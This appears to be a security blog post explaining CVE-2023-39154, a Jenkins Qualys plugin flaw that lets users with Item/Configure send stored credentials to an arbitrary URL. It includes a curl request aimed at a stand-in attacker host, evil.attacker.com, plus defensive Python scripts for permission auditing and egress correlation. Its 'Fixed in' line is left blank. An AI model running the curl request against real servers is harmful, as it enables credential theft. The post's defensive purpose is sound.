Jenkins is a widely-used automation server in the DevOps world, helping developers deploy code and automate tasks. But sometimes, plugins meant to make life easy can turn into the weakest link in your security. One such vulnerability—CVE-2023-39154—was found in the Jenkins Qualys Web App Scanning Connector Plugin, versions 2.0.10 and earlier. In this post, I’ll break down how this flaw can leak your Jenkins credentials, share example code, and point you to references for further research.

What Is CVE-2023-39154?

This vulnerability allows attackers with the global Item/Configure permission in Jenkins to use the Qualys Web App Scanning Connector Plugin to make network requests to any URL they control—using any stored Jenkins credentials they know the ID of (assuming they’ve discovered those credential IDs by other means, such as social engineering or an insecure plugin).

Root Cause:
The plugin doesn’t properly check whether the user should be allowed to use the credential or to connect to an arbitrary URL. Jenkins should require more specific permissions for using a credential in this context, but the plugin allows "over-broad" access.

What Could Go Wrong?

An attacker with Item/Configure rights (not the most powerful role, but widely available) can:

1. Set up a fake HTTPS server under their control.
2. Within Jenkins, invoke the test functionality of the plugin (like the "Test Connection" button) with:
   - The URL of their own server.
   - Their chosen credential ID.
3. The plugin connects to the attacker’s server using those credentials (could be API keys, cloud tokens, etc.), exposing them.
4. Capture the credential when Jenkins makes the outbound connection using it.

Put simply: if someone gets configure rights, they can steal any stored Jenkins credential.

Code Snippet: Post Request Example

The vulnerable endpoint in Jenkins is typically a /descriptorByName/.../testConnection endpoint. Here’s a conceptual curl example simulating what happens under the hood:

curl -u attacker:password \
  -X POST 'https://jenkins.example.com/descriptorByName/com.qualys.jenkins.plugins.wasc.QualysWebAppScan/testConnection' \
  --data-urlencode 'webappUrl=https://evil.attacker.com' \
  --data-urlencode 'credentialsId=secret-jenkins-creds-id'

What happens: The plugin uses the supplied credentials to authenticate to https://evil.attacker.com, and the attacker’s server grabs the credential data.

Why Is This So Dangerous?

- Permissions: You don’t need to be a Jenkins admin—just someone with Item/Configure rights, which are common in many Jenkins setups.
- No user notification: Jenkins won’t alert most users/admins that credentials were exfiltrated.
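Because the exposure starts with who holds Item/Configure, the first thing to know is who that is. The following is an added example (not from this post or from Jenkins) that audits a controller's `config.xml` for explicit Item/Configure grants when the matrix-based authorization strategy is in use. It assumes the `<permission>` entry formats written by the matrix-auth plugin (`permission:sid` in older releases, `USER:`/`GROUP:`/`EITHER:` prefixes in 3.x); the sample `config.xml` is constructed.

```python
"""Added example: list who holds Item/Configure in a Jenkins config.xml that
uses a matrix-based authorization strategy. Not part of the original post."""
import xml.etree.ElementTree as ET

# Constructed sample of $JENKINS_HOME/config.xml; only the authorizationStrategy
# element matters here. Entry formats follow the matrix-auth plugin: older
# releases write "permission:sid", matrix-auth 3.x prefixes USER:/GROUP:/EITHER:.
SAMPLE_CONFIG_XML = """\
<hudson>
  <authorizationStrategy class="hudson.security.ProjectMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Administer:admin</permission>
    <permission>hudson.model.Hudson.Read:authenticated</permission>
    <permission>hudson.model.Item.Configure:alice</permission>
    <permission>USER:hudson.model.Item.Configure:mallory</permission>
    <permission>GROUP:hudson.model.Item.Configure:dev-leads</permission>
    <permission>hudson.model.Item.Read:authenticated</permission>
  </authorizationStrategy>
</hudson>
"""

ITEM_CONFIGURE = "hudson.model.Item.Configure"
OVERALL_ADMINISTER = "hudson.model.Hudson.Administer"


def parse_permission_entry(entry):
    """Return (permission_id, sid, sid_type) for one <permission> text value."""
    parts = entry.strip().split(":")
    if len(parts) == 3 and parts[0] in {"USER", "GROUP", "EITHER"}:
        return parts[1], parts[2], parts[0]
    if len(parts) == 2:  # older format carries no sid type; treat as EITHER
        return parts[0], parts[1], "EITHER"
    raise ValueError(f"unrecognised permission entry: {entry!r}")


def holders_of(config_xml, permission_id=ITEM_CONFIGURE):
    """Explicit grants of permission_id as a list of (sid, sid_type)."""
    root = ET.fromstring(config_xml)
    strategy = root.find("authorizationStrategy")
    if strategy is None:  # e.g. "anyone can do anything" or an unconfigured instance
        return []
    holders = []
    for el in strategy.findall("permission"):
        pid, sid, sid_type = parse_permission_entry(el.text or "")
        if pid == permission_id:
            holders.append((sid, sid_type))
    return holders


def effective_item_configure(config_xml):
    """Explicit Item/Configure grants plus Overall/Administer holders, who get
    every permission implicitly. Returns (sid, sid_type, granted_via)."""
    explicit = [(sid, t, ITEM_CONFIGURE) for sid, t in holders_of(config_xml, ITEM_CONFIGURE)]
    implied = [(sid, t, OVERALL_ADMINISTER) for sid, t in holders_of(config_xml, OVERALL_ADMINISTER)]
    return explicit + implied


if __name__ == "__main__":
    for sid, sid_type, via in effective_item_configure(SAMPLE_CONFIG_XML):
        print(f"{sid:<12} {sid_type:<7} via {via}")
```

Run it against a copy of your own `config.xml`; anyone in the output who does not need to edit job configuration is a candidate for removal, and group entries (here `dev-leads`) need resolving against your identity provider to see who is actually inside them.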

Prevention & Patch

Fixed in:

Permanent mitigations

- Control who has Item/Configure in Jenkins.
- Use monitoring to detect outbound traffic to unexpected hosts from the Jenkins master.
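The footprint of this attack is a request to a plugin's `testConnection` endpoint followed, within seconds, by the controller opening a connection to a host it never normally talks to. The following is an added example (not from this post or from Jenkins) that correlates those two signals: hits on any `/descriptorByName/<descriptor>/testConnection` path in the controller's access log against an egress log, alerting when the destination is outside an allowlist. The log lines, hostnames, users and the allowlist are all constructed; the access-log shape assumed is the NCSA format that winstone's `SimpleAccessLogger` writes, and the egress-log shape is a simple space-separated format you would adapt to your proxy or firewall.

```python
"""Added example: correlate Jenkins testConnection calls with unexpected
outbound connections from the controller. Not part of the original post."""
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit

# Constructed sample of an NCSA-style Jenkins access log. Users, addresses and
# timestamps are made up; the endpoint path is the one quoted in the post.
ACCESS_LOG = """\
10.0.0.5 - alice [26/Jul/2023:14:15:02 +0000] "POST /descriptorByName/com.qualys.jenkins.plugins.wasc.QualysWebAppScan/testConnection HTTP/1.1" 200 87
10.0.0.9 - bob [26/Jul/2023:14:16:40 +0000] "GET /job/build-app/configure HTTP/1.1" 200 51233
10.0.0.7 - mallory [26/Jul/2023:14:20:11 +0000] "POST /descriptorByName/com.qualys.jenkins.plugins.wasc.QualysWebAppScan/testConnection HTTP/1.1" 200 87
"""

# Constructed sample of an egress (proxy/firewall) log for the controller:
# ISO-8601 UTC timestamp, source host, destination host, destination port.
EGRESS_LOG = """\
2023-07-26T14:15:03Z jenkins-controller qualysapi.qualys.com 443
2023-07-26T14:18:30Z jenkins-controller updates.jenkins.io 443
2023-07-26T14:20:12Z jenkins-controller evil.attacker.com 443
"""

# Assumed allowlist: the hosts your controller legitimately talks to.
ALLOWED_EGRESS_HOSTS = {"qualysapi.qualys.com", "updates.jenkins.io"}

ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Any plugin descriptor's "test connection" form-validation endpoint.
TESTCONN_RE = re.compile(r"^/descriptorByName/[^/]+/testConnection$")


def parse_access_log(text):
    """Return the requests that hit a testConnection endpoint."""
    hits = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path  # drop any query string
        if TESTCONN_RE.match(path):
            hits.append({
                "user": m["user"],
                "time": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
                "path": path,
            })
    return hits


def parse_egress_log(text):
    """Return outbound connection events with timezone-aware timestamps."""
    events = []
    for line in text.splitlines():
        ts, src, dst, port = line.split()
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
            "src": src, "dst": dst, "port": int(port),
        })
    return events


def unexpected_egress(events, allowlist=ALLOWED_EGRESS_HOSTS):
    """Connections to hosts outside the allowlist (useful, but noisy on its own)."""
    return [e for e in events if e["dst"] not in allowlist]


def correlate(hits, events, window=timedelta(seconds=30), allowlist=ALLOWED_EGRESS_HOSTS):
    """Pair each testConnection hit with unexpected egress that follows it within `window`."""
    alerts = []
    for hit in hits:
        for e in unexpected_egress(events, allowlist):
            if hit["time"] <= e["time"] <= hit["time"] + window:
                alerts.append({"user": hit["user"], "path": hit["path"],
                               "dst": e["dst"], "port": e["port"],
                               "delay_s": (e["time"] - hit["time"]).total_seconds()})
    return alerts


if __name__ == "__main__":
    for a in correlate(parse_access_log(ACCESS_LOG), parse_egress_log(EGRESS_LOG)):
        print(f"ALERT: {a['user']} called {a['path']}; controller connected to "
              f"{a['dst']}:{a['port']} {a['delay_s']:.0f}s later")
```

On the sample data only mallory's call trips the alert: alice's test is followed by a connection to an allowlisted host, and bob never touched the endpoint. Treat the allowlist as the important tuning knob; a controller that reaches arbitrary SCM and artifact hosts will need a broader list, but the correlation with a `testConnection` call keeps the alert specific even then.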

More Info / References

- Jenkins Security Advisory - CVE-2023-39154
- Qualys Web App Scanning Connector Plugin
- NVD Entry for CVE-2023-39154
- Jenkins Credentials Security Best Practices

Conclusion

CVE-2023-39154 is a textbook case of why every plugin needs strong permission checks around credential use. In Jenkins, even "lower" privileged users can turn a weak point into a full credential spill. With public exploits trivial to make, patch your Jenkins today—don’t trust *any* plugin with your secrets until you vet it.

Stay safe, keep Jenkins locked down, and double-check those plugins!

*Exclusive content by AI. For more security analysis, follow updates on Jenkins Security Advisories.*

Timeline

Published on: 07/26/2023 14:15:00 UTC
Last modified on: 07/31/2023 18:13:00 UTC